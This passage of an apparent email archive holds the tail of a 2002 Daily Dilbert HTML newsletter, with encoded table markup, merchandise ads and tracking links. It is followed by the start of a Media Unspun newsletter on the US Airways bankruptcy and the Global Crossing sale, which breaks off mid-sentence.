 =3D"4" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"32" BGCOLOR=3D"#FFCC66"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10"=
  HEIGHT=3D"32" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"595" HEIGHT=3D"32" BGCOLOR=3D"#FFCC66"&gt;&lt;FONT FA=
 CE=3D"Arial,Verdana" SIZE=3D"1"&gt;Hi Justin, enjoy your daily comic from &lt;A t=
 arget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dae-jOB=
 6QMB3LJ9S2a28-1hV197zDRRR"&gt;Dilbert.com&lt;/A&gt;.&lt;BR&gt;&lt;B&gt;If you like the Daily Dil=
 bert, tell a friend! &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedi=
 a.com:80/Click?q=3Dc4-Iy4lQ0Wy9S4LNo4kHu6-N2ZwudRR"&gt;Click here to send mail=
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"1" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D"http://www.c=
 omics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"7" BOR=
 DER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" BGCOLOR=3D"#FFFFFF" COLSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"605=
 " HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"7" BACKGROUND=3D"http://www.comics=
 .com/comics/dilbert/daily_dilbert/images/ffffff_right.gif"&gt;&lt;IMG SRC=3D"http=
 ://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"4" BORDER=
 =3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- WHITE LINE AND GREETING TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- ONLINE STORE AND STRIP TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"348" BGCOLOR=3D"#003366" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"1" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"348" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"4" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"6" HEIGHT=3D"83" BGCOLOR=3D"#FFFFFF" ROWSPAN=3D=
 "5"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"6" HEIGHT=3D"83" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"585" HEIGHT=3D"19" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"7"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/image=
 s/header_online_store.gif" WIDTH=3D"200" HEIGHT=3D"15" BORDER=3D"0" ALT=3D"=
 "&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif=
 " WIDTH=3D"4" HEIGHT=3D"4" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"9" HEIGHT=3D"83" BGCOLOR=3D"#FFFFFF" ROWSPAN=3D=
 "5"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"9" HEIGHT=3D"83" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"348" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"1" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"348" BACKGROUND=3D"http://www.comi=
 cs.com/comics/dilbert/daily_dilbert/images/white_line_right.gif" ROWSPAN=3D=
 "6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"4" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" HEIGHT=3D"349" ROWSPAN=3D"7"&gt;&lt;IMG SRC=3D"ht=
 tp://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGH=
 T=3D"349" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"200" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/books.gif" WIDTH=3D"35" HEIGHT=3D=
 "15" BORDER=3D"0" ALT=3D"Books"&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://umm=
 ail4.unitedmedia.com:80/Click?q=3Dee-ZbxWQwDOHyMijsO0Q7bZhmqIG9RR"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/ads/book_badge.gif" WIDTH=3D"169" =
 HEIGHT=3D"60" BORDER=3D"0" ALT=3D"Another Day in Cubicle Paradise"&gt;&lt;/A&gt;&lt;BR&gt;=
 &lt;BR&gt;Complete your collection while pretending to work!&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D03=
 -13a3I3rKz-HnmMdhKWclEr1LbRRR"&gt;&gt; Shop&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"10" HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"83" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click=
 ?q=3D2d-OxXyIbKm-PGkhZmVdigfyvwxQdRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/com=
 ics/dilbert/daily_dilbert/images/thumb_dilbert_mints.gif" WIDTH=3D"83" HEIG=
 HT=3D"57" BORDER=3D"0" ALT=3D"Dilbert Mints"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"120" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/mints.gif" WIDTH=3D"35" HEIGHT=3D=
 "15" BORDER=3D"0" ALT=3D"Graphic (live connection required)"&gt;&lt;BR&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"120=
 " HEIGHT=3D"1" BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;They're character-shaped, in colle=
 ctible tins.&lt;BR&gt;&lt;B&gt;&amp;gt; &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedm=
 edia.com:80/Click?q=3D42-rFYcIPK5Kp1oQ3vpzHFNliBPMsRR"&gt;Shop&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;=
 /TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"10" HEIGHT=3D"10" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"162" HEIGHT=3D"24" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/clothing_and_posters.gif" WIDTH=
 =3D"121" HEIGHT=3D"15" BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;Get any Dilbert strip publ=
 ished in the last 90 days printed on a&lt;BR&gt;T-shirt, sweatshirt or poster. Se=
 lected older strips are also available.&lt;BR&gt;
 &lt;B&gt;&amp;gt; &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Clic=
 k?q=3D6c-SUp3IuP-jWA28t2KQMLAN3ZhW9RR"&gt;Shop&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDT=
 H=3D"148" HEIGHT=3D"20" BORDER=3D"0" ALT=3D""&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09&lt;TD WIDTH=3D"14" HEIGHT=3D"35" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"=
 http://www.comics.com/comics/dilbert/daily_dilbert/images/bullet.gif" WIDTH=
 =3D"14" HEIGHT=3D"11" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"148" HEIGHT=3D"35" BGCOLOR=3D"#FFFFFF"&gt;&lt;FONT FA=
 CE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4=
 .unitedmedia.com:80/Click?q=3D96-pjnWQtdfMdGdkmnjZQSkGjZTnRRR"&gt;View all pro=
 ducts&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"585" HEIGHT=3D"5" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"7"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"585" HEIGHT=3D"5" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;!-- COMIC STRIP HERE --&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
                 &lt;TD ALIGN=3D"LEFT" BGCOLOR=3D"#FFFFFF"&gt;&lt;FONT face=3D"helvet=
 ica, arial" size=3D1&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily=
 _dilbert/images/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0=
 "&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D=
 c0-kfy-QWPAzCycXJa4139TJ1l0xdRR"&gt;Modify Your Account&lt;/A&gt;/&lt;A target=3D"_blan=
 k" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dd5-p-SiQzL3adNCbj3HC=
 F4Y-4m5V9RR"&gt;Unsubscribe&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=3D"RIGHT" BGCOLOR=3D"#FFF=
 FFF" COLSPAN=3D"7"&gt;&lt;FONT FACE=3D"helvetica, arial" SIZE=3D"1"&gt;&lt;A target=3D"=
 _blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Deb-HlLoQkD_IXEy=
 _rddo0MBYZjptRRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_di=
 lbert/images/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;B=
 uy This Strip&lt;/A&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;A HREF=3D"http://www.comics.com/webmail=
 /SendAStrip?AppName=3DSendAStrip&amp;ComicName=3D/comics/dilbert/&amp;Attachments=
 =3D/comics/dilbert/archive/images/dilbert2002071741413.gif&amp;EmailDate=3DJuly=
 -13-2002"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/im=
 ages/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;Send This=
  Strip to a Friend&lt;/A&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;A target=3D"_blank" HREF=3D"http:/=
 /ummail4.unitedmedia.com:80/Click?q=3D15-mYZ_IGcO_ExRJtfAVphmLF3t7sRR"&gt;&lt;IMG=
  SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/images/bullet.gi=
 f" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;Month of Dilbert&lt;/A&gt;&amp;nb=
 sp;&amp;nbsp;&lt;/FONT&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
                 &lt;TD ALIGN=3D"LEFT" BGCOLOR=3D"#FFFFFF" COLSPAN=3D"10"&gt;&lt;A ta=
 rget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D3f-4s1E=
 IqMZ4q0DpipHc2hAqHsOX9RR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/=
 archive/images/dilbert2002071741413.gif" BORDER=3D"0" ALT=3D"You need to go=
  online to see today's strip and other cool features on the Daily Dilbert."=
 &gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.=
 gif" WIDTH=3D"600" HEIGHT=3D"8" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- ONLINE STORE AND STRIP TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- FOOTER TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"610" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"610" HEIGHT=3D"1" BGCOLOR=3D"#003366" COLSPAN=
 =3D"8"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"610" HEIGHT=3D"1" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D"http://www.c=
 omics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"4" BOR=
 DER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"478" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"478" HEIGHT=3D"4"=
  BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;FONT FACE=3D"helvetica, arial" SIZE=3D"1"&gt;&lt;A ta=
 rget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D54-l6Hv=
 IZK2Ro_pSAn0OsU__9M2zRRR"&gt;Unsubscribe&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"ht=
 tp://ummail4.unitedmedia.com:80/Click?q=3D7e-XDQeInp4AzBRA_Ci6-UXswLgZsRR"&gt;=
 Modify Your Subscription&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"http://ummail4.=
 unitedmedia.com:80/Click?q=3D93-V4ZmQSdcTa2vKNbcTJj3r1ioJdRR"&gt;Request a New=
  Subscription&lt;/A&gt; | &lt;a href=3D"mailto:dilberthelp@unitedmedia.com"&gt;Report S=
 ubscription Problems&lt;/A&gt;&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dbd=
 -c0dUQ7pwt827nCNpAjVH0WbAg9RR"&gt;Subscribe to the Dilbert Newsletter/Join Dog=
 bert's New Ruling Class&lt;/A&gt; |&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3De7=
 -2y8GQmVrfB-d7KhVqk8cdHM89RRR"&gt;Dilbert on Your Site/Intranet&lt;/A&gt; | &lt;A targe=
 t=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D11-l8ciI2-=
 tW1ZfUpjX3ayWu3EVqsRR"&gt;Advertising Info&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"=
 http://ummail4.unitedmedia.com:80/Click?q=3D3b-XhmVINdmJzbIWEdFPZZh8xiKc9RR=
 "&gt;Dilbert in Your Publication&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"45" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"45" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"62" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"62" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.united=
 media.com:80/Click?q=3D66-kDo_IyWJFs_Ha5zsPE9fNKJ-EsRR"&gt;&lt;IMG SRC=3D"http://=
 www.comics.com/comics/dilbert/daily_dilbert/images/comics_com_logo.gif" WID=
 TH=3D"62" HEIGHT=3D"42" BORDER=3D"0" ALT=3D"Comics.com"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" BACKGROUND=3D"http://www.comics.com/comics/d=
 ilbert/daily_dilbert/images/white_line_right.gif"&gt;&lt;IMG SRC=3D"http://www.co=
 mics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"4" HEIGHT=3D"4" BORD=
 ER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"610" COLSPAN=3D"8"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/daily_dilbert_footer.gif" WIDTH=
 =3D"610" HEIGHT=3D"11" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- FOOTER TABLE END --&gt;
 =09=09=09
 =09=09&lt;/TD&gt;
 =09=09&lt;TD&gt;
 =09=09
 =09=09=09
 =09=09
 =09=09=09&lt;!-- SKYSCRAPER TABLE BEGIN --&gt;
 =09=09=09&lt;table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" height=3D"=
 600"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/=
 small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" BORDER=3D"0" ALT=3D"Advertisement"=
 &gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif"=
  WIDTH=3D"2" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD&gt;&lt;a href=3D"http://www.partner2profit.com/redir.cfm?ccode=
 =3D1D74C2EA&amp;pcode=3DEF39755C" target=3D"_blank"&gt;&lt;img src=3D"http://www.flow=
 go.com/images/bt/p2p.gif?ccode=3D1D74C2EA&amp;pcode=3DEF39755C" width=3D120 hei=
 ght=3D600 border=3D0&gt;&lt;/a&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/table&gt;
 =09=09=09&lt;!-- SKYSCRAPER TABLE END --&gt;
 =09=09=09
 =09=09=09
 =09=09=09
 =09=09&lt;/TD&gt;
 =09&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;!-- CONTENT AND SKYSCRAPER AD TABLE END --&gt;
 &lt;a href=3D"http://www.partner2profit.com/redir.cfm?ccode=3DAFEBB3C4&amp;pcode=
 =3DEF39755C" target=3D"_blank"&gt;&lt;img src=3D"http://www.flowgo.com/images/bt/=
 p2p.gif?ccode=3DAFEBB3C4&amp;pcode=3DEF39755C" width=3D"120" height=3D"600" bor=
 der=3D"0"&gt;&lt;/a&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://ummail4.unitedmedia.com:80/Click?q=
 =3Da5-Dy_H-gZ_S_MorD1HzMxC1ObQ"&gt;
 --15263843.1026556855445.JavaMail.root.umsan1--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Brother, Can You Spare a Jet?
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format...
 ------------=_1029157891-23956-4
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 To view this newsletter in full-color, visit:
 http://newsletter.mediaunspun.com/index000018838.cfm
 MEDIA UNSPUN
 What the Press is Reporting and Why (www.mediaunspun.com)
 -----------------------------------------------------------------
 August 12, 2002
 -----------------------------------------------------------------
 IN THIS ISSUE
 -----------------------------------------------------------------
 * BROTHER, CAN YOU SPARE A JET?
 * REMEMBER GLOBAL CROSSING?
 * OTHER STORIES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ADVERTISEMENT
 -----------------------------------------------------------------
 Ken Fisher offers his Quarterly Report for high net worth
 investors FREE of cost &amp; without obligation. Access the same
 investment research he uses to guide his clients at:
 http://pcg.fisherinvestments.com/newrespond/letter.asp?site=UNSP&amp;KC=1229EFCAD0000
 -----------------------------------------------------------------
 BROTHER, CAN YOU SPARE A JET?
 -----------------------------------------------------------------
 Creditors and shareholders of U.S. Airways found themselves in
 the upright and locked position Sunday as the nation's
 sixth-largest airline filed for bankruptcy protection.
 The Arlington, Va.-based carrier sought cover under the
 bankruptcy code's Chapter 11, but much of its trouble could be
 traced to Sept. 11. Remember when all U.S. airports reopened
 except for Reagan Washington, which was too close to the White
 House and other gov sites? Remember how it was weeks before the
 first lonely flights lifted at last? Guess which airline was the 
 major carrier there. (Hint: It's the same one that bled $2
 billion in the past year.)
 Even before the terror attacks, U.S. Airways was an animal in
 pain. To all the usual industry troubles, add these: fierce
 competition from discounters, a too-small area of service
 concentrated on the East Coast, and an unofficial battle with
 United Airlines for the highest labor costs in the business.
 Frustrated, the carrier tried to throw in the towel two years
 ago, reminded the Washington Post. In a bid to get bought by
 United, U.S. Airways pleaded to federal antitrust regulators
 that it was too small to survive on 
 its own. The feds disagreed and blocked the deal.
 Now, of course, U.S. Airways has a new flight plan. Among those
 likely to get airsick: shareholders, whose investment has
 vanished; employees, many of whom are expected to lose their
 jobs, even though their unions have conceded hundreds of
 millions of dollars in pay; and creditors, especially
 plane-leasing companies, which will collect only as much as a
 bankruptcy judge approves. (Where, by the way, is the reporter
 who will pick up the story of these leasing companies? Not one
 creditor was named in any account we could find. Yet before we
 soak our hankies over U.S. Airways, we'd like to hear a word
 from the folks getting stiffed.)
 Need a silver lining? Check out the Wall Street Journal, which
 observes that Continental Airlines "soared to profitability"
 thanks to its time in rehab a decade ago. We're guessing that
 anecdote is on the minds of Texas Pacific Group, which is
 plunking down $200 million for two-fifths of U.S. Airways. Texas 
 Pacific also played friend in need to Continental -- and
 pocketed 11 times its investment.
 Meanwhile, it will be "business as usual" for U.S. Airways
 customers, the company's chief assured a skeptical New York
 Times. The airline will even continue to track and to honor
 frequent-flier miles. Better still: Cautious customers can use
 U.S. Airways miles to book flights with its marketing partner,
 United. And, hey, according to an analyst quoted in the Journal, 
 there's at least a 20% chance that United won't be the next
 major carrier to announce it's gone broke. - Lori Patel
 US Airways Files for Chapter 11
 http://abcnews.go.com/wire/Business/ap20020811_1301.html
 US Airways Announces Bankruptcy
 http://www.nytimes.com/2002/08/12/business/12AIR.html
 Shifts to Cause Rerouting of Some Booked Fliers
 http://www.nytimes.com/2002/08/12/business/12CONS.html
 US Airways Files for Bankruptcy Protection
 http://www.washingtonpost.com/wp-dyn/articles/A6587-2002Aug11.html
 US Airways Group, Hit Hard By Terror, Files for Chapter 11
 http://online.wsj.com/article/0,,SB1029103594827437995,00.html
 (Paid subscription required.)
 -----------------------------------------------------------------
 ADVERTISEMENT
 -----------------------------------------------------------------
 You've heard about identity management, but do you know about
 the opportunities and business models that will emerge as a
 result? Download a free executive summary of Esther Dyson's coverage of
 identity management in Release 1.0. Learn more about the
 expanding market for these services and applications.
 http://release1.edventure.com/executivesummary.cfm?MCode=Unspun
 -----------------------------------------------------------------
 REMEMBER GLOBAL CROSSING?
 -----------------------------------------------------------------
 Follow-up has never been the media's strong suit. Once stories
 fade from page one, so does reporters' interest. And in this
 summer of corporate scandals, remembering back to Global
 Crossing's January implosion and bankruptcy is akin to trying to 
 recall the fuss over chads.
 The Financial Times pegged the company's bankruptcy sale Friday
 a "long-awaited" transaction, but few other outlets seemed to be 
 holding their breath. The dearth of coverage is too bad, because 
 the shock value of the numbers alone is worth attention,
 especially with Enron and WorldCom following behind it in the
 Chapter 11 aisle. Bankruptcy, it seems, means never having to
 say you're sorry. Global Crossing owed $12 billion when it filed 
 for bankruptcy in January. Its sale price? $250 million -- and
 that's for only a nearly two-thirds stake. Sound too low? Back
 in January, Global Crossing could have gotten much more, three
 times that much, and from the very same investment team, Asian
 conglomerates Hutchison Whampoa and Singapore Technologies
 Telemedia. But Global Crossing sniffed it was worth way more. 
 Now that it has discovered it's worth way less, here's how the
 deal carves up what's left of Global Crossing's pie, pending the 
 regulatory approval that's expected in about six months. The two 
 investors get a 61.5% stake; bank creditors get 6%, and
 bondholders get about a one-third share. Who's missing from the
 slice-and-dice? Shareholders, of course, who get nothing. The
 company is unapologetic, and creditors feel lucky for the
 crumbs. "The reality is we could have done considerably worse,"
 the Wall Street Journal quoted Edward Weisenfelder, a lawyer for 
 the creditors. As for the shrewd buyers, the Financial Times
 quoted Hutchison's official statement that the deal would extend 
 its telecom capabilities, particularly in its broadband service. 
 But the Wall Street Journal speculated that the company is
 simply buying low so it can sell higher. 
 Global Crossing's turned-down offer of $750 million is
 approximately the same amount the company's founder, Gary
 Winnick, reaped in personal riches from the sale of his stock,
 as the Journal noted in its page-one story on the telecom
